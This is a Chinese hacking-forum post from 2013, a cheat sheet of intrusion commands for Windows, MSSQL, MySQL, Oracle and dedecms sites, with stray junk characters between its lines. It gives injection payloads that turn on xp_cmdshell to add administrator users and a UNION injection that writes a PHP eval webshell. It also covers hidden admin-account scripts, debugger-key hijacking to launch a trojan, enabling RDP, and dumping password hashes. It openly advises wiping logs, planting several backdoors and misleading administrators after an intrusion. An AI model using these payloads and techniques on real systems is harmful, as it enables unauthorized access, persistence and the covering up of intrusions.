找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4962|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ T5 Y/ D9 k! B: Y2 n. `1.net user administrator /passwordreq:no
; h# A% h9 G, A; V1 i/ A# K2 Q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 T! f/ `# [1 E3 k+ I2.比较巧妙的建克隆号的步骤
: f2 B+ C* \; d$ T- t" M- `+ i5 S* N先建一个user的用户
, v% v! J( g$ ]/ `4 c然后导出注册表。然后在计算机管理里删掉
: B* {1 {! B* c2 [/ r在导入,在添加为管理员组5 r" W" \& X0 A- _# ~& v7 _% A" ]) v
3.查radmin密码
' w' r* A6 t! y" @  }reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& V% t7 v- z' |: Z9 [4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options], P' i0 }; q% f% m; l7 e7 r
建立一个"services.exe"的项
0 ]/ i) S% d3 \) t9 R% e再在其下面建立(字符串值)% D& h+ h8 {, o4 s* w3 k
键值为mu ma的全路径6 q# ~, O  x8 O3 H$ m
5.runas /user:guest cmd
# R  J. h+ T8 n6 n. y& z测试用户权限!# V4 b" g3 o0 D* N  k. S1 u
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
  Q4 |& |; Y7 W" D5 ~7 H1 s7.入侵后漏洞修补、痕迹清理,后门置放:) ^) T2 f4 Q0 Y& u- @
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门  v( p6 n' i2 ~' H( O* N  b
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c+ {) m; x! T, U& T7 }

& O' i% q6 A6 X0 |for example
3 @7 T# M2 N* E, m$ W, d% c
6 q" d+ c# N# H) q- ]0 ^& Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
6 z$ k" N: R9 z* D# S/ A0 T4 m* i7 |0 l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
8 q; Q8 C* l( W& F2 ]
! Q7 X3 l; H( M; l9 j7 x  u9:MSSQL SERVER 2005默认把xpcmdshell 给ON了3 ^+ z' R, ^; u
如果要启用的话就必须把他加到高级用户模式0 J' H- o: C: i1 a6 {
可以直接在注入点那里直接注入' S8 b. O# q8 Z+ W8 ~: w( l
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--; Z' n2 f' P1 z  k
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
  D+ n/ L$ [9 ]3 b或者6 e' P$ \6 `5 X' Y
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( }3 B, t% I" i* G3 d0 F' u
来恢复cmdshell。# D8 p, n: O' v. {
7 }' O- [+ D4 x' V
分析器1 S7 i: k/ @5 d. D+ p" Y
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
8 U8 D; t' {. U! P# J然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")) Z" ~1 e! w0 J/ t( n
10.xp_cmdshell新的恢复办法9 }  F8 Z$ V7 [$ ]( ~& ^
xp_cmdshell新的恢复办法
3 f" i! O8 [+ j4 E3 e扩展储存过程被删除以后可以有很简单的办法恢复:$ u4 {( m; \# V; g4 u+ ~
删除
- j7 r/ V9 K6 q) f4 ]. ldrop procedure sp_addextendedproc
5 H7 [, b+ d: k& k& tdrop procedure sp_oacreate9 `( W' H. I( ~, ~1 H; R/ F( y
exec sp_dropextendedproc 'xp_cmdshell'
6 x2 V/ Q; }/ k/ B5 T% z% Y
8 |! C1 A* a6 a* [, L% A恢复
! ?5 g9 T* m  f0 C9 ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")
$ D2 S0 W/ t+ P7 Hdbcc addextendedproc ("xp_cmdshell","xplog70.dll")9 H& \9 s. {4 a/ _( c
) z! U5 R. K6 {3 v9 d; B; M9 E7 a
这样可以直接恢复,不用去管sp_addextendedproc是不是存在. r% @6 j! d+ M

$ m- s5 k6 ^8 i. {-----------------------------. m9 z0 q) n& j" d# B' s' b

3 ~1 B, p  i1 i9 N5 x( I6 k  l. }删除扩展存储过过程xp_cmdshell的语句:
) W) R) y4 v" L; @1 oexec sp_dropextendedproc 'xp_cmdshell'  [. n6 \% n2 K3 X

5 Z6 {$ j9 W/ E恢复cmdshell的sql语句+ {: h2 F: V/ |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 Q6 ?! G0 Y; L8 J! W' m" h% M$ W; o- u
# q4 f/ i- S* h, K
开启cmdshell的sql语句
4 I  v% b7 h( E$ M7 p/ a; K& I$ A3 k$ n9 A4 O
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'+ T7 Z& r& ]8 A6 t
% D$ C) s6 w) N2 r* f" n( A
判断存储扩展是否存在
$ S1 E  M* v3 X7 [select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# {) ?# A: P2 P( P" M/ b; r; `' L
返回结果为1就ok3 \/ O' H9 A; V' N
9 f8 l/ c. r+ I3 H
恢复xp_cmdshell  c8 P. [  w$ K  R: I5 t
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 h5 Z: d0 Y( a2 C: w+ u
返回结果为1就ok
( m; a" q4 a) ]" G8 Y
" j4 V6 A6 {  _# U/ H否则上传xplog7.0.dll  f: T; [; m3 x$ q
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
$ A8 a: M$ j1 Z
2 b8 H+ s* P) s$ K堵上cmdshell的sql语句
. B; f7 f+ P* I0 S2 N. V1 R, Zsp_dropextendedproc "xp_cmdshel
3 _. T3 ?8 \& k-------------------------% i! d& c2 L8 p) H
清除3389的登录记录用一条系统自带的命令:
( Z6 z- v, g% c, Areg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f' b0 b3 S  T% C. u4 \8 i6 h7 R2 T, C
3 _$ [% B4 ?2 e" t8 J
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
2 T) m; A6 R( B. u% }在 mysql里查看当前用户的权限5 O/ h, n$ t5 W; M) D1 t
show grants for  1 d# ^. }4 @4 W: n6 q7 b

  u$ z3 Y' P" T( i! e( r" ]以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。9 d, p% W" h' P  f
/ a- c* e/ c( C  w6 H6 B6 z- C% G

! ^- U: I5 @$ r! d5 E& d( |( M- M7 }Create USER 'itpro'@'%' IDENTIFIED BY '123';" N7 Q' f- K' A5 I$ S/ ^! ^8 n+ c

: v: W. {8 f1 W) E  j- J! `GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION5 c& T/ p" A- M7 ^, s% N. ~
0 ]$ ^5 @, m1 q, m# u1 d) {
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
, k3 H! M7 ~4 a" s1 K
8 }! ^! U5 J4 C, }; d1 F$ FMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 G4 M+ r7 O' s) Z+ d7 N4 {' g; h. L) A  k" ^1 o7 w2 T
搞完事记得删除脚印哟。1 a! P  |5 i* a( y: h$ X

+ C. Y" M3 S/ o: K: e- ?Drop USER 'itpro'@'%';
9 y5 a5 ]4 K' z! k2 O5 ^; `6 j2 Q' }& V# X# p
Drop DATABASE IF EXISTS `itpro` ;2 c. W! n: W/ C9 K0 W$ X# O

7 \3 z4 G# X- [当前用户获取system权限
5 j/ c: g0 v) P8 b* Y+ ^& y! u6 m0 ]sc Create SuperCMD binPath= "cmd /K start" type= own type= interact1 o; j; e" ^: S: K/ c9 S2 T: g
sc start SuperCMD
% N) |- n& ~3 M. o! M9 k5 k5 y1 m程序代码
; m6 K7 l+ w" r- q9 z9 `) s; }<SCRIPT LANGUAGE="VBScript">
8 _+ k* |) t9 @set wsnetwork=CreateObject("WSCRIPT.NETWORK")
6 t. n; b/ f7 Z' F' S( i$ \- v3 Q- ?os="WinNT://"&wsnetwork.ComputerName& N9 k, e) o) V5 K1 h) i$ e$ H
Set ob=GetObject(os)
1 F. X! N0 R# A+ N  N% A2 WSet oe=GetObject(os&"/Administrators,group")
6 j- B0 k1 H' e# K# dSet od=ob.Create("user","nosec")
" p5 h8 f) {; God.SetPassword "123456abc!@#"' ]$ P" n, Y2 f# _
od.SetInfo
- f0 w7 t- O! u5 u' C+ u9 o- v% f! XSet of=GetObject(os&"/nosec",user)# C$ E$ ]0 J. R
oe.add os&"/nosec"& B7 a6 |8 Q" R- `7 F5 H) T
</Script>
% d0 M: m' W2 \1 S4 f/ J% Z<script language=javascript>window.close();</script>/ S0 `' m: \; v& W$ b8 X
: N0 G$ h& e; r* V% M

8 m9 |' `7 n6 A) u/ M4 s
+ t7 f: Q, g0 ~4 ~! f0 j5 v# k2 z6 m# ^) s+ D! E" [3 c' m0 c- L3 u
突破验证码限制入后台拿shell
: x7 w' r2 H7 A( W2 E2 j程序代码* l& Z' c0 x; T, {" E! b8 C
REGEDIT4
: M. d( N( d7 i' ][HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
4 B! ^! n6 B1 j. H; N"BlockXBM"=dword:00000000/ T% b! J9 l! S, A  M
0 p: V9 ^- R4 q. Y/ l$ Y
保存为code.reg,导入注册表,重器IE9 A$ t. m  J9 O$ S- o8 I9 G
就可以了
1 t$ {$ l+ I4 C4 uunion写马
5 g5 J7 J: f+ e3 \9 L, I& E- F2 p程序代码
: Y; b# L0 z0 y6 {www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
, l2 n% G& k3 q
/ N9 f4 l7 q- q" M7 M) s# L) ~应用在dedecms注射漏洞上,无后台写马
/ B; r& H$ e8 P; z- }0 `dedecms后台,无文件管理器,没有outfile权限的时候, f* s0 F2 w1 Z" ]0 N2 l
在插件管理-病毒扫描里
- ^- l( Y7 V) r1 q1 K写一句话进include/config_hand.php里
/ R$ f. q6 T4 {1 I/ h程序代码
, v" d, W' f8 C& _2 |, d>';?><?php @eval($_POST[cmd]);?>. Y1 u* q# _3 ^4 @( ~% G

  f& [/ I+ a  Q$ b: t2 V6 Q+ ?: J( c: V: A2 S* w6 _  Z
如上格式
2 S  j5 @# I0 [0 J; S; U/ i' o
0 @8 `) n& ]! }! E% V& joracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解# c8 S" I8 d% Z) V6 U6 b0 U  _
程序代码/ F6 z, M( {& v8 [  X8 \
select username,password from dba_users;
0 Z( L8 e+ M) D. _+ k3 O' g
! F* O2 H1 Z) x; k" f! i  `. ~# v* G0 z) ?1 m
mysql远程连接用户) s: ?: W6 n5 B0 v0 m* A) m
程序代码$ o9 K4 `' [7 T7 S# g% d5 P

. a: s- A- ~% Q0 JCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';! [. `: J8 N8 @" K
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION2 r7 F5 l) |/ U* M' e8 l! I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; m/ n1 \! M/ O- m9 H9 b* Q$ c
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ D( i% l, \2 I: I4 q6 P5 g5 U  D4 ~4 t* \

; W, {5 t+ P& v$ f. I9 I
& ^) h( T* [7 R, X' N, b0 l9 q  A6 G4 \7 i1 K
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 07 J4 j4 H, q9 V+ d

" C' J' W: ^& C: g; F0 }3 ~$ C1.查询终端端口; X. Z5 i2 W& o- [

' V2 @3 ^4 v3 ?& a2 Yxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2 t9 Q, S( X4 e- n

$ ~# R- C4 {" T0 [( I6 w通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
. f0 }+ K3 i0 R8 B7 G# y1 l! btype tsp.reg
  ~  c5 q# C) Z9 M6 k- S# g5 {  J& \
# n3 v0 U2 O. p' k% m1 @) s2.开启XP&2003终端服务
- J+ ^4 d# l# a! @: ]9 L0 J" e2 w3 o: J% G5 k- K0 w

; b3 J& U- f+ g6 ?' bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f7 V' ~4 n7 P0 I' I% N+ O: d
. T! Y9 R! V0 A9 {5 n: x' |# W' a" H( n' t

* T) x* `; ^% `# H+ h2 h- i1 rREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f6 e* Y) B7 s3 h) @/ {
( x8 C! y' q1 N, g8 K$ r# E+ M$ o7 H
3.更改终端端口为20008(0x4E28)% P; p' M. U& ?* |- w( h/ V
6 n2 W; }4 J) T! l9 C
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ P7 \& o: b. z: X0 ^5 N( Y+ @

+ H; h% [7 i7 j$ g! IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f9 S1 T1 }0 b5 `9 h. N1 M% y8 n

/ N, z4 x; b7 j  {8 ^: g2 D4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
/ D) H5 }8 p$ i' Z& Z; X  Z9 A. t& L: l) c/ @* A6 Q
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f8 A: |9 h4 Z+ I( ]4 D' f" z

# P7 ~8 Y% R: k. _
5 O  v: n: `! k! I. s5.开启Win2000的终端,端口为3389(需重启)8 ~/ x3 r0 j& B" c  t

2 r4 f! l( L- ]$ mecho Windows Registry Editor Version 5.00 >2000.reg # j0 o1 d# B, [) r! Z4 h
echo. >>2000.reg
: \: T: Q% {" {( Cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
( ]! e3 l) K. oecho "Enabled"="0" >>2000.reg ; z! @5 A# u' u5 ?# H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
  J- `) Z) y8 I* Secho "ShutdownWithoutLogon"="0" >>2000.reg
  F- x: _' e  `5 b1 Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg * w( x9 P( l! n4 a" c% F8 a
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 0 x2 z1 r: K0 P: @  v& r3 V; F( Q1 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
4 ^/ r; C9 V  x4 O0 I4 e* Oecho "TSEnabled"=dword:00000001 >>2000.reg
  f8 e+ G# u0 t* |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ; b9 w- a& _: i$ J$ @
echo "Start"=dword:00000002 >>2000.reg
8 u; `- W; R  X' G) Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg + z' g6 ~& a9 |& |
echo "Start"=dword:00000002 >>2000.reg 2 u; Y7 p) E& \& \# |! {9 x3 W
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
# c( B! E4 Q. Q* b( k- w* [6 kecho "Hotkey"="1" >>2000.reg 6 O( N7 B2 f7 r1 F% [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg " f/ S1 _" U3 j4 M; F9 s
echo "ortNumber"=dword:00000D3D >>2000.reg & W$ q) X8 w' ]! }4 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 5 W1 G  ^# O; [' n8 K* g
echo "ortNumber"=dword:00000D3D >>2000.reg
) F( b4 r4 t! q. o1 ]6 b* |8 s6 @1 n; Z% _& \
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
, V0 t0 w  g4 C8 B, g
/ E; A. N0 Y. i* A8 S8 m@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
8 i+ z& @% t' N! k9 }& m" w(set inf=InstallHinfSection DefaultInstall)
, `& R3 Z/ b( {) E1 g3 oecho signature=$chicago$ >> restart.inf/ |# @; Q- K9 ?% {+ O7 Z" L& M5 m
echo [defaultinstall] >> restart.inf
) n, B& v6 `, Z# g: i5 Y1 hrundll32 setupapi,%inf% 1 %temp%\restart.inf
$ j$ I, A; C  v0 V' p; P! W7 r. D; G. P1 T% B' I
6 w0 [9 V: W9 Y7 f( v" r: _' q4 e
7.禁用TCP/IP端口筛选 (需重启)
8 n8 I* ~& s3 L1 u1 O' n3 Y) C6 i3 F* [/ k# j7 T
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f) ^0 E- P' O: h3 T$ z

9 H2 }4 r1 x: v$ Y9 \$ O8.终端超出最大连接数时可用下面的命令来连接7 l8 ~" Y+ O4 b) x1 t/ r
" f+ a9 |2 l4 F+ s
mstsc /v:ip:3389 /console
" e% B- o9 _+ K; b% ?& X5 o9 R- {; G
9.调整NTFS分区权限
4 @- j" C( ]4 q6 X5 l; q
6 l( T. y( n0 N8 G5 o, J/ {cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利). w& ]1 E3 s% r. ~* k- r5 d

3 I$ A3 q; p) \$ m, d8 t0 Bcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)( j1 J: h1 ]! i+ `; |; ~

# W9 @4 o. b- H, u/ @3 Y; o------------------------------------------------------
+ a9 ~* @3 l' H2 C. P4 V3389.vbs
8 |* K: ?4 X1 uOn Error Resume Next" P& L: l4 P3 `  r
const HKEY_LOCAL_MACHINE = &H80000002
% a: ?  f! ]/ P# q0 k% _strComputer = "."# u( T5 e  Z) Y- U7 t2 B
Set StdOut = WScript.StdOut
, X6 k) u( P+ I% D) Q  e3 k, _' X( ]Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_( S6 ]+ G  u5 f  M6 z
strComputer & "\root\default:StdRegProv")
" y, l: l$ d: v+ i2 g, YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server". n$ ~) P& `* m( i) S. s
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath9 T: S) Y# z$ E% Z8 T" S
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 [- M& n( J* r9 |oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
- `+ d4 [3 K& c% HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 U6 K6 U1 Y; l  M" vstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
. P* `' b5 s- c$ k- DstrValueName = "fDenyTSConnections"
: g5 \* A( P8 ~dwValue = 0
6 a  A' z( J& Coreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' D7 w' R1 c" p/ I' R/ \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; M, t* g" ?, k! ?1 }strValueName = "ortNumber"
8 z0 k- M" Q* G! DdwValue = 3389! |* b$ d! V: b3 H! G+ z- y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' A  t0 u& K' c- ]# LstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 Y" X/ t* b( W9 FstrValueName = "ortNumber"/ w5 T0 F  Y0 X  ~; H9 R/ t
dwValue = 3389) V; _# j7 }) Q! I6 `9 C- \
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) I: H" U' ^! hSet R = CreateObject("WScript.Shell") 3 `8 N2 r( \; f  W8 j
R.run("Shutdown.exe -f -r -t 0") 1 R7 ?+ }! z7 d- h  D
( L* D3 \, _0 w: ^7 x; R' _; t( u
删除awgina.dll的注册表键值) p. g# {+ ^( R$ R/ \
程序代码8 C* g# m; s4 h

; y) i. D9 Q9 Lreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
% S# F2 R6 ^0 g! J- e! @9 p5 ~1 ?
9 L' c# T8 l: ^2 g2 x2 j
" L9 T6 z5 O7 V* a7 R+ F% v: w  s, y( l
( L) Z  H( H- y8 R4 p# {
程序代码0 X( r0 i" F1 `/ n/ ]) x3 r
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
% `+ u; u/ c( E. K0 @$ v  o6 f+ A9 i& ?: }
设置为1,关闭LM Hash" r! O' G) K5 r/ f3 f
* P$ A& B$ p# C9 w; h0 ^) |
数据库安全:入侵Oracle数据库常用操作命令
% \  p# @" Z% S6 E1 K2 m2 j& S/ k最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。3 \7 t9 J! W4 v2 x8 f: a- e
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。" Z; D! n# J# [/ I0 r/ M0 {
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
8 z" W4 x/ E: B3、SQL>connect / as sysdba ;(as sysoper)或# g" j- m, R2 C" N
connect internal/oracle AS SYSDBA ;(scott/tiger)9 \- P5 ~3 \7 s/ i4 ?/ k
conn sys/change_on_install as sysdba;
+ d8 H' U& w5 B9 N+ B4、SQL>startup; 启动数据库实例
9 E, z+ ?5 g; S5、查看当前的所有数据库: select * from v$database;
, M/ y! S& b* t  W4 v4 S6 z' G6 Aselect name from v$database;- X% Z8 ^" s* C* v. J! ?
6、desc v$databases; 查看数据库结构字段
3 d5 y8 H& A7 b5 l) x# l7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:) I/ I8 h( n3 z% O1 i
SQL>select * from V_$PWFILE_USERS;
4 T8 n& I. C# v. U% BShow user;查看当前数据库连接用户
8 o# y# R, I/ I7 `, u7 _  f; l8、进入test数据库:database test;
) E$ d* w: j7 {! Q9、查看所有的数据库实例:select * from v$instance;
5 [# }1 A! }/ x如:ora9i: w& r; s! x# X. _9 J8 G2 H
10、查看当前库的所有数据表:
2 v0 C6 G$ y; v( D" M. GSQL> select TABLE_NAME from all_tables;
$ V* ?! f& N+ Z( nselect * from all_tables;
. V3 j7 w+ T6 uSQL> select table_name from all_tables where table_name like '%u%';* ]. R4 P# f1 q* ?# g
TABLE_NAME
9 ]. h- }/ D! q: j# m" F------------------------------
/ ?, a% \, U% R; b_default_auditing_options_( D4 Z" k: [. _! g
11、查看表结构:desc all_tables;
  f, m; B! M6 N5 Y! p7 \8 A12、显示CQI.T_BBS_XUSER的所有字段结构:- m  Z" _! q: q; M, V0 P
desc CQI.T_BBS_XUSER;
" X4 M: a  d) g  ^13、获得CQI.T_BBS_XUSER表中的记录:) F) G1 P. `; J
select * from CQI.T_BBS_XUSER;
6 T/ H$ J" o, R14、增加数据库用户:(test11/test)- W8 M+ f$ k; N" c: H
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
6 K6 X7 w% T2 O2 J! L' n15、用户授权:
* ^; C" ]) ^' f5 fgrant connect,resource,dba to test11;
8 B9 d' Y# |2 Z  Y" e% ^grant sysdba to test11;
  D$ Q  b3 g& R* T* }commit;+ a# j& D$ |" }/ H( Y
16、更改数据库用户的密码:(将sys与system的密码改为test.)! K  `1 c4 D- N
alter user sys indentified by test;
" ]# X, I8 ~5 Y+ H2 Talter user system indentified by test;
4 ^% C. ]1 ~! v7 c& b0 x; A
# j/ \' n. O! f# Y4 `" \; z0 sapplicationContext-util.xml: e; D( `4 i3 j  W) k# k+ }2 Q
applicationContext.xml
2 y; C9 m, \7 T$ J2 _struts-config.xml9 @9 ^" n& p' \5 U8 Y/ m2 x
web.xml
2 \! k/ i& k+ X' r$ xserver.xml
* B" L0 V) O! b) `tomcat-users.xml
/ J. G' N, F2 [) Khibernate.cfg.xml1 _& c4 j. s- q" U+ f
database_pool_config.xml
, P! @: V# x* v; q* y: z8 R+ w: ?: Z2 |$ \; x

5 s/ W9 V: a; ]; {; ]\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! S0 o6 x: T8 r! B- J
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini) L- e1 m% n. a
\WEB-INF\struts-config.xml  文件目录结构7 g! S7 i4 ?/ T  m; j6 x0 ~

+ n: y: @4 |- G5 a; Dspring.properties 里边包含hibernate.cfg.xml的名称; d, N* F+ Q  D) J: e3 m( \  C+ a
. e7 c0 e7 X* V& q+ z$ e% ?2 m( u4 N* r
3 D9 ?. k0 I. d( R) p3 y5 c  [
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml2 C) Y8 p+ o) n& m' I) v

4 \: S3 ^% A% D& c# }  C) G如果都找不到  那就看看class文件吧。。8 h- v. D7 B( i9 g5 ~
- p# d! E; n, V: C7 X4 z4 ~
测试1:: V8 }4 p+ B% [7 E
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 N8 A! @& L" X  L( V. h/ D2 p# J1 }) |' u% \0 j7 {
测试2:
+ h6 \% X+ e* e
8 p. s1 Z0 [/ R: ?$ s: s4 T- e; i3 lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
/ h/ @& P+ ^) [9 q6 V8 u) L9 C- g* U5 C
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--4 R1 A* i, `  J7 t) `0 h# a
, x& {, J$ q& k! O  x9 ]1 c
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 l3 R0 ^/ D- K% u
/ T. T- }! B7 V8 Y+ `6 R查看虚拟机中的共享文件:% V9 j5 Y0 T) Z! V: `2 \" c4 u3 W
在虚拟机中的cmd中执行/ O8 `5 k7 h: \: i+ H4 i3 f7 i
\\.host\Shared Folders9 Z! G8 L0 p1 }) i3 b
* D% t8 o* d! g; D+ e4 K; t
cmdshell下找终端的技巧1 r5 Z$ M9 d" P, Q, j
找终端: ' d: f( t4 B8 ?0 n& l& a
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
6 I' l5 `$ w- _3 g# P3 f   而终端所对应的服务名为:TermService 5 ]. n% d1 i. m" w1 f& D$ c
第二步:用netstat -ano命令,列出所有端口对应的PID值! 2 g( }9 O. Y$ L2 H; `& x  F( x* l$ s
   找到PID值所对应的端口+ y" G! J9 n4 x% N% S
8 T. b9 d) y$ |
查询sql server 2005中的密码hash! n% ]- h- H3 ]  p! G( x
SELECT password_hash FROM sys.sql_logins where name='sa'
